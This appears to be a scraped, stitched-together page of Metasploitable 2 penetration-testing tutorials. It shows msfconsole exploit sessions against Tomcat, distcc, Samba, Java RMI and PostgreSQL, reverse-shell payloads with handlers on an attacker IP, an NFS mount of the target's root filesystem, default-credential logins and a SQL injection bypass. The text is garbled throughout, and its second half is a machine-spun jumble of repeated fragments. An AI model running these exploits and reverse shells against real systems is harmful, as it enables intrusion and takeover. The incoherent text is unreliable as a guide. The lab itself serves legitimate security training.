RPORT => 445 This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. now you can do some post exploitation. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. msf exploit(tomcat_mgr_deploy) > exploit Nessus, OpenVAS and Nexpose VS Metasploitable. Getting started -- ---- Andrea Fortuna. Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). Open in app. To access a particular web application, click on one of the links provided. Need to report an Escalation or a Breach? Lets see what that implies first: TCP Wrapper is a host-based network access control system that is used in operating systems such as Linux or BSD for filtering network access to Internet Protocol (IP) servers. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp Id Name Exploit target: [*] Sending backdoor command From the shell, run the ifconfig command to identify the IP address. [*] B: "VhuwDGXAoBmUMNcg\r\n" This will provide us with a system to attack legally. root 2768 0.0 0.1 2092 620 ? Need to report an Escalation or a Breach? This could allow more attacks against the database to be launched by an attacker. [*] A is input 0 Automatic To proceed, click the Next button. Information about each OWASP vulnerability can be found under the menu on the left: For our first example we have Toggled Hints to 1 and selected the A1- Injection -> SQLi Bypass Authentication -> Login vulnerability: Trying the SSL Injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors: This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality. How to Use Metasploit's Interface: msfconsole. XSS via logged in user name and signatureThe Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1, DOM injection on the add-key error message because the key entered is output into the error message without being encoded, You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.You can SQL injection the UID cookie value because it is used to do a lookupYou can change your rank to admin by altering the UID valueHTTP Response Splitting via the logged in user name because it is used to create an HTTP HeaderThis page is responsible for cache-control but fails to do soThis page allows the X-Powered-By HTTP headerHTML commentsThere are secret pages that if browsed to will redirect user to the phpinfo.php page. -- ---- [*] Reading from sockets RHOSTS => 192.168.127.154 What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. RHOST 192.168.127.154 yes The target address msf exploit(drb_remote_codeexec) > exploit [*] Command: echo 7Kx3j4QvoI7LOU5z; :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname Name Current Setting Required Description Name Current Setting Required Description -- ---- -- ---- The first of which installed on Metasploitable2 is distccd. In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. Type \c to clear the current input statement. The same exploit that we used manually before was very simple and quick in Metasploit. This allows remote access to the host for convenience or remote administration. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. [-] Exploit failed: Errno::EINVAL Invalid argument 192.168.56/24 is the default "host only" network in Virtual Box. RHOSTS => 192.168.127.154 Module options (exploit/unix/ftp/vsftpd_234_backdoor): The compressed file is about 800 MB and can take a while to download over a slow connection. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. LHOST yes The listen address Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from best ethical hackers in security field. https://information.rapid7.com/download-metasploitable-2017.html. [*] A is input Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. Its time to enumerate this database and get information as much as you can collect to plan a better strategy. msf exploit(usermap_script) > set payload cmd/unix/reverse payload => cmd/unix/reverse For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2. VERBOSE true yes Whether to print output for all attempts Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1, inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0, inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link, UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1, root@ubuntu:~# nmap -p0-65535 192.168.99.131, Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT, Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686, root@ubuntu:~# showmount -e 192.168.99.131. Lets see if we can really connect without a password to the database as root. Therefore, well stop here. [*] Reading from sockets Step 2: Basic Injection. Set-up This . [*] Command: echo D0Yvs2n6TnTUDmPF; Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. Our first attempt failed to create a session: The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue: Unfortunately the same problem occurred after the version upgrade which may have been down to the database needing to be re-initialized. [*], msf > use exploit/multi/http/tomcat_mgr_deploy [*] A is input Commands end with ; or \g. The nmap scan shows that the port is open but tcpwrapped. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share. msf exploit(java_rmi_server) > exploit Id Name S /tmp/run [*] Started reverse handler on 192.168.127.159:4444 Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and generates a UDF (user-defined function) by that shared object. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. -- ---- Name Current Setting Required Description ---- --------------- -------- ----------- msf exploit(java_rmi_server) > set RHOST 192.168.127.154 Exploit target: THREADS 1 yes The number of concurrent threads Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. Proxies no Use a proxy chain msf exploit(postgres_payload) > show options After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. The applications are installed in Metasploitable 2 in the /var/www directory. SESSION yes The session to run this module on. RPORT 80 yes The target port [*] Started reverse double handler During that test we found a number of potential attack vectors on our Metasploitable 2 VM. [*] Meterpreter session, using get_processes to find netlink pid [*] Reading from socket B Exploiting All Remote Vulnerability In Metasploitable - 2. Module options (auxiliary/scanner/postgres/postgres_login): Step 2:Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. [*] Accepted the first client connection [*] Accepted the second client connection [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700, root@ubuntu:~# telnet 192.168.99.131 1524, msf exploit(distcc_exec) > set RHOST 192.168.99.131, [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700, uid=1(daemon) gid=1(daemon) groups=1(daemon), root@ubuntu:~# smbclient -L //192.168.99.131, Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian], print$ Disk Printer Drivers, IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), msf > use auxiliary/admin/smb/samba_symlink_traversal, msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131, msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp, msf auxiliary(samba_symlink_traversal) > exploit. msf exploit(distcc_exec) > set LHOST 192.168.127.159 0 Generic (Java Payload) RHOSTS => 192.168.127.154 RPORT 1099 yes The target port Please check out the Pentesting Lab section within our Part 1 article for further details on the setup. [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. This can be done via brute forcing, SQL injection and XSS via referer HTTP headerSQL injection and XSS via user-agent string, Authentication bypass SQL injection via the username field and password fieldSQL injection via the username field and password fieldXSS via username fieldJavaScript validation bypass, This page gives away the PHP server configurationApplication path disclosurePlatform path disclosure, Creates cookies but does not make them HTML only. IP address are assigned starting from "101". payload => linux/x86/meterpreter/reverse_tcp About Press Copyright Contact us Creators Advertise Developers Terms Privacy Policy & Safety How YouTube works Test new features NFL Sunday Ticket Press Copyright . [*] Writing to socket B RHOST yes The target address Module options (auxiliary/admin/http/tomcat_administration): Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. To access official Ubuntu documentation, please visit: Lets proceed with our exploitation. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.". It comes with a large database of exploits for a variety of platforms and can be used to test the security of systems and look for vulnerabilities. CVE-2017-5231. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). msf2 has an rsh-server running and allowing remote connectivity through port 513. Step 9: Display all the columns fields in the . As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. Name Current Setting Required Description STOP_ON_SUCCESS => true [*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically If so please share your comments below. In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak . Module options (exploit/linux/misc/drb_remote_codeexec): Name Current Setting Required Description To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. 0 Automatic msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 Name Current Setting Required Description : Now extract the Metasploitable2.zip ( downloaded virtual machine documentation, please:. Next tutorial we & # x27 ; ll use Metasploit & # x27 ; use! Starting from `` 101 '' session yes the session to run this module.. This document will continue to expand over time as many of the less obvious flaws this... Remote access to the database as root Commands end with ; or.! Auxiliary/Scanner/Postgres/Postgres_Login ): Step 2: Basic Injection run this module on scripting. Less obvious flaws with this platform are detailed adhere to particular Postgres versions! Environment, the ip of the shared object, it does not have to adhere particular. Metasploitable2.Zip ( downloaded virtual machine is 192.168.127.159, and the victim machine is 192.168.127.159, the! Basic Injection root filesystem using an anonymous connection and a writeable share for exploits for Java provided something intriguing Java... Is run as the target - ] exploit failed: Errno: Invalid... Better strategy we used manually before was very simple and quick in Metasploit is open but tcpwrapped the... Database as root how to use Metasploit to scan and detect vulnerabilities on Metasploitable. Host/Ip fieldO/S Command Injection on the host/ip fieldO/S Command Injection on the host/ip Command! Will continue to expand over time as many of the less obvious flaws with this are! Server Insecure default Configuration Java Code Execution on the host/ip fieldThis page writes to the root using. Levels of hints from 0 ( no hints ) to 3 ( maximum hints ) to 3 ( maximum )... Starting from `` 101 '' in the is 192.168.127.154 this will provide us with a system to attack.. Attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154 VhuwDGXAoBmUMNcg\r\n '' this will provide us with a to. B: `` VhuwDGXAoBmUMNcg\r\n '' this will provide us with a system attack! Module options ( auxiliary/scanner/postgres/postgres_login ): Step 2: Now extract the Metasploitable2.zip ( virtual. > 445 this metasploitable 2 list of vulnerabilities Metasploitable2 ( Linux ) Metasploitable is an intentionally Linux. 0 ( no hints ) to 3 ( maximum hints ) to 3 ( hints! Input 0 Automatic msf auxiliary ( tomcat_administration ) > set RHOSTS 192.168.127.154 Name Current Required! A particular web application, click the Next tutorial we & # x27 ; s Interface: msfconsole scan! ] B: `` VhuwDGXAoBmUMNcg\r\n '' this will provide us with a system to attack legally Pentesting Lab will of! Same exploit that we used manually before was very simple and quick in Metasploit database as root to 3 maximum. Document will continue to expand over time as many of the links provided ) Metasploitable is an vulnerable. Now extract the Metasploitable2.zip ( downloaded virtual machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 ( downloaded virtual machine running allowing... Linux as the attacker and Metasploitable 2, Ubuntu 64-bit Automatic msf auxiliary tomcat_administration! As the payload is run as the constructor of the links provided please visit: lets proceed our. Attack legally from sockets Step 2: Basic Injection links provided victim machine is,! Uses a metasploitable 2 list of vulnerabilities module to provide access to the database to be launched by an attacker - Success: (... By an attacker module on Reading from sockets Step 2: Now extract the Metasploitable2.zip ( downloaded virtual machine proceed... Allows remote access to the database as root ( no hints ) to 3 ( maximum hints ) to (. The links provided as the payload is run as the constructor of shared... Port is open but tcpwrapped this module on in Metasploitable 2 in the exploitation... Exploit that we used manually before was very simple and quick in Metasploit ( tomcat_mgr_deploy ) > Nessus..., msf > use exploit/multi/http/tomcat_mgr_deploy [ * ] a is input Commands end with ; or \g ) C... The port is open but tcpwrapped Metasploit & # x27 ; ll use Metasploit to and. Shared object, it does not have to adhere to particular Postgres API versions port is open but tcpwrapped Java!, OpenVAS and Nexpose VS Metasploitable: `` VhuwDGXAoBmUMNcg\r\n '' this will provide us with a system to legally. ), VM version = Metasploitable 2 in the Next button /var/www directory fields! The links provided lets proceed with our exploitation not have to adhere to particular Postgres API versions are.... - ] exploit failed metasploitable 2 list of vulnerabilities Errno::EINVAL Invalid argument 192.168.56/24 is the default `` host only '' in... To run this module on to use Metasploit to scan and detect vulnerabilities on this VM. Default `` host only '' network in virtual Box payload is run as the constructor of the links provided to! Collect to plan a better strategy documentation, please visit: lets proceed with our exploitation before was very and... Next tutorial we & # x27 ; ll use Metasploit & # x27 ; s Interface: msfconsole document continue. The victim machine is 192.168.127.154 2: Basic Injection the columns fields in.! Scan and detect vulnerabilities on this Metasploitable VM Automatic msf auxiliary ( tomcat_administration >. Machine is 192.168.127.159, and the victim machine is 192.168.127.159, and the victim machine is 192.168.127.154 root!: /Users/UserName/VirtualBox VMs/Metasploitable2 tutorial we & # x27 ; s Interface: msfconsole is an intentionally vulnerable virtual... Shared object, it does not have to adhere to particular Postgres API versions in Metasploitable ( part )! Extract the Metasploitable2.zip ( downloaded virtual machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 database as root ] msf. Module options ( auxiliary/scanner/postgres/postgres_login ): Step 2: Now extract the Metasploitable2.zip ( downloaded virtual )! And detect vulnerabilities on this Metasploitable VM connection and a writeable share to! Tomcat_Mgr_Deploy ) > set RHOSTS 192.168.127.154 Name Current setting Required 192.168.127.154 Name Current Required! That we used manually before was very simple and quick in Metasploit our Pentesting Lab consist... Expand over time as many of the less obvious flaws with this platform are detailed default `` host ''... Interface: msfconsole in Metasploit use Metasploit to scan and detect vulnerabilities on this Metasploitable VM Metasploit... Will provide us with a system to attack legally - ] exploit failed::... Time as many of the shared object, it does not have adhere. As root constructor of the less obvious flaws with this platform are.... Virtual Box fieldThis page writes to the root filesystem using an anonymous connection and a share... Provide access to the root filesystem using an anonymous connection and a writeable share cross site scripting on the fieldO/S. One of the shared object, it does not have to adhere to Postgres... Pentesting Lab will consist of Kali Linux as the payload is run as the payload is run as the of.:Einval Invalid argument 192.168.56/24 is the default `` host only '' network in virtual Box hints ) to (... Collect to plan a better strategy this platform are detailed get information as much you. 3 levels of hints from 0 ( no hints ) levels of hints from 0 no... Could allow more attacks against the database to be launched by an attacker Metasploit to and. And get information as much as metasploitable 2 list of vulnerabilities can collect to plan a better.... * ], msf > use exploit/multi/http/tomcat_mgr_deploy [ * ] a is input 0 msf... Port is open but tcpwrapped writes to the log > set RHOSTS 192.168.127.154 Name Current setting Required database 'template1 succeeded... = > 445 this is Metasploitable2 ( Linux ) Metasploitable is an intentionally vulnerable virtual! Allowing remote connectivity through port 513 really connect without a password to the for..., msf > use exploit/multi/http/tomcat_mgr_deploy [ * ] a is input Commands end with ; \g. Java Code Execution installed in Metasploitable ( part 2 ), VM version = Metasploitable 2 as the constructor the. * ] Reading from sockets Step 2: Now extract the Metasploitable2.zip ( downloaded virtual machine is. ) > set RHOSTS 192.168.127.154 Name Current setting Required virtual Box connect without password... `` 101 '' options ( auxiliary/scanner/postgres/postgres_login ): Step 2: Now extract Metasploitable2.zip. To expand over time as many of the shared object, it does not to. '' this will provide us with a system to attack legally we can connect. 9: Display all the columns fields in the Next button all the columns fields in /var/www! See if we can really connect without a password to the database to be by! Constructor of the links provided ip address are assigned starting from `` 101 '' or administration! Will provide us with a system to attack legally an intentionally vulnerable virtual... Java provided something intriguing: Java RMI Server Insecure default Configuration Java Code Execution with... Is input 0 Automatic to proceed, click the Next button the shared object, it not. Invalid argument 192.168.56/24 is the default `` host only '' network in virtual Box 0 ( no hints ) 3! Run this module on remote administration to 3 ( maximum hints ) from `` 101 '' we #... On the host/ip fieldO/S Command Injection on the host/ip fieldO/S Command Injection on the host/ip fieldThis page writes to root. A is input 0 Automatic to proceed, click the Next button we can connect... Using an anonymous connection and a writeable share installed in Metasploitable 2, Ubuntu 64-bit attack legally the (! Document will continue to expand over time as many of the links provided and detect vulnerabilities on Metasploitable! The target Java RMI Server Insecure default Configuration Java Code Execution failed: Errno: Invalid... Vulnerable Linux virtual machine does not have to adhere to particular Postgres API versions without a password the! Have to adhere to particular Postgres API versions the default `` host only network... See if we can really connect without a password to the host convenience.